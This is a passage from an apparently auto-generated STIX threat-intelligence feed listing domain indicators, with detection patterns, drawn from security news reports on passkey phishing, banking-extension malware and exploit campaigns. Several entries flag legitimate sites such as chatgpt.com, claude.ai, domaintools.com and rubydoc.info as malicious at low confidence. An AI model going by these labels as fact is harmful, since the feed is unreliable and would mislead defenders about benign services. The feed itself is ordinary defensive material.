Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d77f9b1f-191b-472b-8be3-5e10ae6933df","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: zaviro.online","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: xtension and main-v2 parameters returned volmira[.]site and zaviro[.]online , respectively. Notably, the main-v2 value was updated on","pattern":"[domain-name:value = 'zaviro.online']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b2f24079-087e-4f6d-b0f4-709116aa03fe","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: add-passkey.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: keyhelpdesk[.]com secure-passkey[.]com setupmypasskey[.]com add-passkey[.]com integratedsso[.]com oktasession[.]com syncmykey[.]com por","pattern":"[domain-name:value = 'add-passkey.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--67c0f6b5-84ce-49bf-8420-5281544528b7","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: domainlify.net","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: of the registered domains are below - service-nowinc[.]com domainlify[.]net Passkey-Themed Social Engineering Leads to Cloud Compromi","pattern":"[domain-name:value = 'domainlify.net']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--34d1deb9-b8e2-49f3-a76a-015ad5756e38","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: integratedsso.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: secure-passkey[.]com setupmypasskey[.]com add-passkey[.]com integratedsso[.]com oktasession[.]com syncmykey[.]com portalsetuphub[.]com It","pattern":"[domain-name:value = 'integratedsso.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f64bccbf-4719-4277-99fb-8ba223e884ef","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: oktasession.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: setupmypasskey[.]com add-passkey[.]com integratedsso[.]com oktasession[.]com syncmykey[.]com portalsetuphub[.]com It's worth noting th","pattern":"[domain-name:value = 'oktasession.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b1623995-821f-4624-9d19-9b182e7d9285","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: passkeyhelpdesk.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: in the pattern: \"<company name>.<malicious domain>[.]com\" - passkeyhelpdesk[.]com secure-passkey[.]com setupmypasskey[.]com add-passkey[.]c","pattern":"[domain-name:value = 'passkeyhelpdesk.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--67313f3a-5962-4114-acfc-61ed6c84ef78","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: portalsetuphub.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: .]com integratedsso[.]com oktasession[.]com syncmykey[.]com portalsetuphub[.]com It's worth noting that this modus operandi overlaps with","pattern":"[domain-name:value = 'portalsetuphub.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--83aa12ce-01fc-479d-bf5c-f36d58a85d6a","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: secure-passkey.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: any name>.<malicious domain>[.]com\" - passkeyhelpdesk[.]com secure-passkey[.]com setupmypasskey[.]com add-passkey[.]com integratedsso[.]co","pattern":"[domain-name:value = 'secure-passkey.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ec628ed6-41d8-46cb-9c90-183bd3f7ff9f","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: service-nowinc.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: and individuals. Some of the registered domains are below - service-nowinc[.]com domainlify[.]net Passkey-Themed Social Engineering Leads","pattern":"[domain-name:value = 'service-nowinc.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3e1ad3a0-e156-4cfb-83b7-27f96ddb8d49","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: setupmypasskey.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: domain>[.]com\" - passkeyhelpdesk[.]com secure-passkey[.]com setupmypasskey[.]com add-passkey[.]com integratedsso[.]com oktasession[.]com s","pattern":"[domain-name:value = 'setupmypasskey.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b803b750-4c48-4a15-bca1-ca888926309f","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: syncmykey.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: com add-passkey[.]com integratedsso[.]com oktasession[.]com syncmykey[.]com portalsetuphub[.]com It's worth noting that this modus op","pattern":"[domain-name:value = 'syncmykey.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--99f46a42-14bd-45d1-92cf-757bfba79b75","created":"2026-09-12T10:24:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: gemini-advertisers.com","description":"Seen in \"When the Whole Company Adopts AI: What It Does to Your SOC\" (The Hacker News). Context: iated with Google and instead rely on the suspicious domain gemini-advertisers[.]com, indicating a brand impersonation attempt designed to dri","pattern":"[domain-name:value = 'gemini-advertisers.com']","pattern_type":"stix","valid_from":"2026-09-12T10:24:44.000Z","labels":["auto-extracted","research"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/when-whole-company-adopts-ai-what-it.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1f1402aa-70d8-4824-b2d6-4275d5823feb","created":"2026-09-12T09:07:56.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: rubydoc.info","description":"Seen in \"OpenAI Agents Linked to RubyGems Campaign That Gained RCE on RubyDoc Servers\" (The Hacker News). Context: The agents are said to have exploited a design quirk in the RubyDoc.info documentation build process to exfiltrate public data from","pattern":"[domain-name:value = 'rubydoc.info']","pattern_type":"stix","valid_from":"2026-09-12T09:07:56.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/openai-agents-linked-to-rubygems.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--be1a1d2d-9528-42ce-8fd5-c5adb7592d97","created":"2026-09-12T08:04:47.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: gitprogram.com","description":"Seen in \"China-Linked Hackers Chain Chrome Zero-Day With Windows Kernel Flaw in Attacks\" (GBHackers). Context: address UTA0560 Host associated with cloud.shinewrist[.]net gitprogram[.]com Domain JungleBamboo Phishing, exploit delivery, and C2 in","pattern":"[domain-name:value = 'gitprogram.com']","pattern_type":"stix","valid_from":"2026-09-12T08:04:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-chain-chrome-zero-day/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--840864fe-9c96-42d5-84de-69650a969cee","created":"2026-09-12T08:04:47.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: ocr.opusaccel.top","description":"Seen in \"China-Linked Hackers Chain Chrome Zero-Day With Windows Kernel Flaw in Attacks\" (GBHackers). Context: 0560 Exploit-hosting and command-and-control infrastructure ocr[.]opusaccel[.]top Domain UTA0560 GRIMWEDGE JScript backdoor C2 endpoint 2","pattern":"[domain-name:value = 'ocr.opusaccel.top']","pattern_type":"stix","valid_from":"2026-09-12T08:04:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-chain-chrome-zero-day/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d616929a-27cc-4449-8cea-f202ab52cc10","created":"2026-09-12T08:04:47.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: shinewrist.net","description":"Seen in \"China-Linked Hackers Chain Chrome Zero-Day With Windows Kernel Flaw in Attacks\" (GBHackers). Context: Compromise Indicator Type Actor Description / SHA256 cloud.shinewrist[.]net Domain UTA0560 Exploit-hosting and command-and-control in","pattern":"[domain-name:value = 'shinewrist.net']","pattern_type":"stix","valid_from":"2026-09-12T08:04:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-chain-chrome-zero-day/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--456af911-e71d-47b0-8543-e355bf8dc5e0","created":"2026-09-12T06:16:51.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: abre.ai","description":"Seen in \"New Phishing Campaign Abuses Windows Mshta.exe to Steal Credentials and Secrets\" (GBHackers). Context: shortening services including goo[.]su , abrir[.]link , and abre[.]ai . Teams should also investigate suspicious traffic involv","pattern":"[domain-name:value = 'abre.ai']","pattern_type":"stix","valid_from":"2026-09-12T06:16:51.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/new-phishing-campaign-abuses-windows-mshta-exe/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c96d84ed-57ab-4aac-bbc0-7fd546340930","created":"2026-09-12T06:16:51.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: abrir.link","description":"Seen in \"New Phishing Campaign Abuses Windows Mshta.exe to Steal Credentials and Secrets\" (GBHackers). Context: to associated URL-shortening services including goo[.]su , abrir[.]link , and abre[.]ai . Teams should also investigate suspiciou","pattern":"[domain-name:value = 'abrir.link']","pattern_type":"stix","valid_from":"2026-09-12T06:16:51.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/new-phishing-campaign-abuses-windows-mshta-exe/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e4848a71-ca50-435d-80c3-ca021c6d8fa6","created":"2026-09-12T06:16:51.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: archivogratuito.online","description":"Seen in \"New Phishing Campaign Abuses Windows Mshta.exe to Steal Credentials and Secrets\" (GBHackers). Context: g the victim environment. Mitigation Defenders should block archivogratuito[.]online and monitor or restrict traffic to associated URL-shorten","pattern":"[domain-name:value = 'archivogratuito.online']","pattern_type":"stix","valid_from":"2026-09-12T06:16:51.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/new-phishing-campaign-abuses-windows-mshta-exe/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e8d68ca4-9259-4539-b36c-a8c05929ae9d","created":"2026-09-12T06:16:51.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: goo.su","description":"Seen in \"New Phishing Campaign Abuses Windows Mshta.exe to Steal Credentials and Secrets\" (GBHackers). Context: ict traffic to associated URL-shortening services including goo[.]su , abrir[.]link , and abre[.]ai . Teams should also invest","pattern":"[domain-name:value = 'goo.su']","pattern_type":"stix","valid_from":"2026-09-12T06:16:51.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/new-phishing-campaign-abuses-windows-mshta-exe/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1d1f59be-86d3-45ee-9e43-3f14e78cd8ae","created":"2026-09-11T20:19:09.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: policenationale.cc","description":"Seen in \"Hackers abused Claude to extract secrets from 1.8M Android apps\" (BleepingComputer). Context: . Anthropic says that 'frkoo' also set up a carding shop at policenationale[.]cc that impersonated the French national police to sell stol","pattern":"[domain-name:value = 'policenationale.cc']","pattern_type":"stix","valid_from":"2026-09-11T20:19:09.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-abused-claude-to-extract-secrets-from-18m-android-apps/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--425e1881-9fe5-4efc-b7a0-13b3a1b9ccb3","created":"2026-09-11T17:26:50.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: add-passkey.com","description":"Seen in \"Passkey-themed phishing attacks lead to Microsoft 365 data theft\" (BleepingComputer). Context: pdesk[.]com , secure-passkey[.]com , setupmypasskey[.]com , add-passkey[.]com , integratedsso[.]com , oktasession[.]com , keysyncos[.]c","pattern":"[domain-name:value = 'add-passkey.com']","pattern_type":"stix","valid_from":"2026-09-11T17:26:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/passkey-themed-phishing-attacks-lead-to-microsoft-365-data-theft/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b0605134-1111-4ad3-8511-f6919d659f41","created":"2026-09-11T17:26:50.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: integratedsso.com","description":"Seen in \"Passkey-themed phishing attacks lead to Microsoft 365 data theft\" (BleepingComputer). Context: -passkey[.]com , setupmypasskey[.]com , add-passkey[.]com , integratedsso[.]com , oktasession[.]com , keysyncos[.]com , and oskeysync[.]c","pattern":"[domain-name:value = 'integratedsso.com']","pattern_type":"stix","valid_from":"2026-09-11T17:26:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/passkey-themed-phishing-attacks-lead-to-microsoft-365-data-theft/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--168e9d97-ed45-4760-a224-ade9c1473cca","created":"2026-09-11T17:26:50.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: keysyncos.com","description":"Seen in \"Passkey-themed phishing attacks lead to Microsoft 365 data theft\" (BleepingComputer). Context: d-passkey[.]com , integratedsso[.]com , oktasession[.]com , keysyncos[.]com , and oskeysync[.]com . The attackers commonly place the","pattern":"[domain-name:value = 'keysyncos.com']","pattern_type":"stix","valid_from":"2026-09-11T17:26:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/passkey-themed-phishing-attacks-lead-to-microsoft-365-data-theft/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--67e6dab1-15fd-419b-b4d6-11f7ae3c1233","created":"2026-09-11T17:26:50.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: oktasession.com","description":"Seen in \"Passkey-themed phishing attacks lead to Microsoft 365 data theft\" (BleepingComputer). Context: mypasskey[.]com , add-passkey[.]com , integratedsso[.]com , oktasession[.]com , keysyncos[.]com , and oskeysync[.]com . The attackers c","pattern":"[domain-name:value = 'oktasession.com']","pattern_type":"stix","valid_from":"2026-09-11T17:26:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/passkey-themed-phishing-attacks-lead-to-microsoft-365-data-theft/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--77cbb086-3c30-47fa-80d1-67072ea4392d","created":"2026-09-11T17:26:50.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: oskeysync.com","description":"Seen in \"Passkey-themed phishing attacks lead to Microsoft 365 data theft\" (BleepingComputer). Context: gratedsso[.]com , oktasession[.]com , keysyncos[.]com , and oskeysync[.]com . The attackers commonly place the victim company's name","pattern":"[domain-name:value = 'oskeysync.com']","pattern_type":"stix","valid_from":"2026-09-11T17:26:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/passkey-themed-phishing-attacks-lead-to-microsoft-365-data-theft/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--73769d48-b4d2-4db0-a478-712b49ce1701","created":"2026-09-11T17:26:50.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: passkeyhelpdesk.com","description":"Seen in \"Passkey-themed phishing attacks lead to Microsoft 365 data theft\" (BleepingComputer). Context: tity verification. Some examples seen by Microsoft include: passkeyhelpdesk[.]com , secure-passkey[.]com , setupmypasskey[.]com , add-passk","pattern":"[domain-name:value = 'passkeyhelpdesk.com']","pattern_type":"stix","valid_from":"2026-09-11T17:26:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/passkey-themed-phishing-attacks-lead-to-microsoft-365-data-theft/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5b7c28f6-3468-4fd8-86c6-0255d0469ade","created":"2026-09-11T17:26:50.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: secure-passkey.com","description":"Seen in \"Passkey-themed phishing attacks lead to Microsoft 365 data theft\" (BleepingComputer). Context: examples seen by Microsoft include: passkeyhelpdesk[.]com , secure-passkey[.]com , setupmypasskey[.]com , add-passkey[.]com , integratedss","pattern":"[domain-name:value = 'secure-passkey.com']","pattern_type":"stix","valid_from":"2026-09-11T17:26:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/passkey-themed-phishing-attacks-lead-to-microsoft-365-data-theft/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--29d09806-d673-4cae-a71a-16a41a19cd0b","created":"2026-09-11T17:26:50.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: setupmypasskey.com","description":"Seen in \"Passkey-themed phishing attacks lead to Microsoft 365 data theft\" (BleepingComputer). Context: oft include: passkeyhelpdesk[.]com , secure-passkey[.]com , setupmypasskey[.]com , add-passkey[.]com , integratedsso[.]com , oktasession[.","pattern":"[domain-name:value = 'setupmypasskey.com']","pattern_type":"stix","valid_from":"2026-09-11T17:26:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/passkey-themed-phishing-attacks-lead-to-microsoft-365-data-theft/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--35685020-b106-429b-a690-dbf71525f9d4","created":"2026-09-11T15:26:58.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: cdn.quickdelivr.com","description":"Seen in \"India’s STPI serves TerminalFix-style attack via fake Cloudflare check\" (CSO Online). Context: n of the site’s source shows an external script loaded from cdn[.]quickdelivr[.]com, a domain less than a week old and vaguely resembling t","pattern":"[domain-name:value = 'cdn.quickdelivr.com']","pattern_type":"stix","valid_from":"2026-09-11T15:26:58.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"CSO Online","url":"https://www.csoonline.com/article/4221243/indias-stpi-serves-terminalfix-style-attack-via-fake-cloudflare-check.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8548a6f9-dafd-4e47-bbcf-838ed4f4d35f","created":"2026-09-11T15:26:58.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: domaintools.com","description":"Seen in \"India’s STPI serves TerminalFix-style attack via fake Cloudflare check\" (CSO Online). Context: address located in Hong Kong, according to data provided by domaintools.com. Dubey attributed both the fake overlay and clipboard manip","pattern":"[domain-name:value = 'domaintools.com']","pattern_type":"stix","valid_from":"2026-09-11T15:26:58.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"CSO Online","url":"https://www.csoonline.com/article/4221243/indias-stpi-serves-terminalfix-style-attack-via-fake-cloudflare-check.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--824a0c88-ca81-4ef3-a798-70bd763b91cb","created":"2026-09-11T15:26:58.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: stpi.in","description":"Seen in \"India’s STPI serves TerminalFix-style attack via fake Cloudflare check\" (CSO Online). Context: ector stakeholders. The activity was observed on the ananta.stpi[.]in subdomain by cybersecurity researcher and red teamer Vibh","pattern":"[domain-name:value = 'stpi.in']","pattern_type":"stix","valid_from":"2026-09-11T15:26:58.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"CSO Online","url":"https://www.csoonline.com/article/4221243/indias-stpi-serves-terminalfix-style-attack-via-fake-cloudflare-check.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--42ab1cb4-27ae-4f50-ab36-6eaa75ed6c56","created":"2026-09-11T14:01:11.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: chatgpt.com","description":"Seen in \"How Threat Actors Are Turning Trusted AI Platforms Into an Attack Surface\" (BleepingComputer). Context: ok conversations: shared, indexable conversations hosted on chatgpt.com and grok.com that can rank for troubleshooting searches. Ea","pattern":"[domain-name:value = 'chatgpt.com']","pattern_type":"stix","valid_from":"2026-09-11T14:01:11.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/how-threat-actors-are-turning-trusted-ai-platforms-into-an-attack-surface/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--97e343c8-cd5e-4089-93ce-4759d8b2e370","created":"2026-09-11T14:01:11.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: claude.ai","description":"Seen in \"How Threat Actors Are Turning Trusted AI Platforms Into an Attack Surface\" (BleepingComputer). Context: started with a malicious Claude Artifact hosted on the real claude.ai domain. Since public Artifacts are meant for lightweight de","pattern":"[domain-name:value = 'claude.ai']","pattern_type":"stix","valid_from":"2026-09-11T14:01:11.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/how-threat-actors-are-turning-trusted-ai-platforms-into-an-attack-surface/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--aef8c73d-858d-4f85-93fd-aa9f3bc7f402","created":"2026-09-11T14:01:11.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: grok.com","description":"Seen in \"How Threat Actors Are Turning Trusted AI Platforms Into an Attack Surface\" (BleepingComputer). Context: : shared, indexable conversations hosted on chatgpt.com and grok.com that can rank for troubleshooting searches. Each of these s","pattern":"[domain-name:value = 'grok.com']","pattern_type":"stix","valid_from":"2026-09-11T14:01:11.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/how-threat-actors-are-turning-trusted-ai-platforms-into-an-attack-surface/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--72382e63-3b4d-483d-acd3-091cec553e1f","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: domainlify.net","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: om Sender email address used to send campaign emails Domain domainlify[.]net Newly registered domain used in the Reply-To address Note","pattern":"[domain-name:value = 'domainlify.net']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security 